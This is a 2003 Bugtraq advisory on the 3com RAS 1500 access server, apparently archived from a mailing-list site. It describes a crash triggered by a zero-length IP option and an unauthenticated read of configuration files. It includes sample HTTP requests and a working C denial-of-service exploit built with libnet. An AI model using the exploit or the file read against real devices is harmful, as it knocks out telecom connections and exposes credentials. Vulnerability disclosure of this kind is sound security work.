Home page logo
/

bugtraq logo Bugtraq mailing list archives

3com RAS 1500 Remote vulnerabilities.
From: Piotr Chytla <pch () isec pl>
Date: Mon, 24 Mar 2003 16:56:21 +0100 (CET)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Synopsis:   3com RAS 1500 Remote vulnerabilities. 
Product:    3C433279A-US http://www.3com/ras1500
Version:    Firmware X2.0.10

URL:        http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
Author:     Piotr Chytla <pch () isec pl>
Date:       February 27, 2003


Issue:
- ------

 3com SuperStack II Remote Access System 1500 is telco device which 
 provides access via BRI-ISDN/Analog to dialin users. 
 It contains two remote vulnerabilities, first is Denial Of Service that 
 leads to system crash, second can be used to read configuration files. 


Details:
- -------

1. Remote Denial of Service 

 It is possible to remotely reboot RAS 1500 (Router unit) system by sending
 malformed packet with ip option len field set to zero. This bug can cause 
 loosing all switched connections on PRI-ISDN interface.

2. Configuration file read

 Unauthorized user can read configuration and system files, using web
 interface on RAS 1500 .
 
    GET /download.htm HTTP/1.0 
    HTTP/1.0 401 Unauthorized
    WWW-Authenticate: Basic realm="RAS1500"
    Content-Type: text/html
    Server: Allegro-Software-RomPager/2.10
 
    GET /user_settings.cfg HTTP/1.0
    HTTP/1.0 200 OK
    Content-Type: multipart
    Date: Mon, 25 May 1998 00:26:38 GMT
    Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
    Content-Length: 1258
    Server: Allegro-Software-RomPager/2.10
    [..]
    
    content of user_setting.cfg

 RAS 1500 requires HTTP basic authorization only for download.htm file,
 which is download manager for configuration files and system software.
 Unfortunately system images and configuration files are not protected by
 HTTP authorization.

Impact:
- -------
 
 Malicious user is able to remotely crash RAS 1500 - Router Unit, this 
 cause dropping all switched connections to PRI-ISDN interface. 
 Remote attacker can also read and modify RAS configuration when he broke 
 access passwords.


Exploit:
- --------
Below is attached a working proof-of-concept exploit for vulnerability no.1. 
 
- ------X<------isec-options.c------X<------
/* 
 * 3com superstack II RAS 1500 remote Denial of Service
 *
 * Piotr Chytla <pch () isec pl>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 *
 * (c) 2003 Copyright by iSEC Security Research
 */
 
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <libnet.h>
#define OPT_LEN 4
void usage()
{
  printf("Args: \n");
  printf("-s [source address]\n");
  printf("-d [destination address]\n");
}

int main(int argc,char *argv[]) 
{
 char a;
 int sock,r;
 u_long src;
 u_long dst;
 char pktbuf[IP_MAXPACKET];
 char payload[]="ABCDEFGHIJKLMNOPRST";
 u_char options[4];
 struct ipoption ipopt;
 bzero(options,OPT_LEN);
 while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
 {
     switch(a) {
         case 'h' : { usage(); exit(1); }
         case 's' : { src=libnet_name_resolve(optarg,0); break;}
         case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
        }
 }
 sock = libnet_open_raw_sock(IPPROTO_RAW);
 if (sock<0)
 {
 perror("socket");
 exit(1);
 }

 libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
  memcpy(ipopt.ipopt_list, options, OPT_LEN);
  *(ipopt.ipopt_list)     = 0xe4;
  *(ipopt.ipopt_list+1)   = 0;
  *(ipopt.ipopt_list+1)   = 0;
  *(ipopt.ipopt_list+1)   = 0;
  r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
  if (r <0)
   {
        libnet_close_raw_sock(sock); 
        printf("Error ip options insertion failed\n");
        exit(1);
   }
  r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
  if (r<0)
  {
   libnet_close_raw_sock(sock);
   printf("Error write_ip \n");
   exit(1);
  }  
 libnet_close_raw_sock(sock);
 return 0;
}

- ------X<------isec-options.c------X<------
 
- -- 
Piotr Chytla
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+fylwC+8U3Z5wpu4RAr7MAKDqCSwMeF78nlFiSRATmAmgTyfeHQCg09cg
kkYmmXxc8sgurfL8XUhGo2s=
=bAQc
-----END PGP SIGNATURE-----


  By Date           By Thread  

Current thread:
  • 3com RAS 1500 Remote vulnerabilities. Piotr Chytla (Mar 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]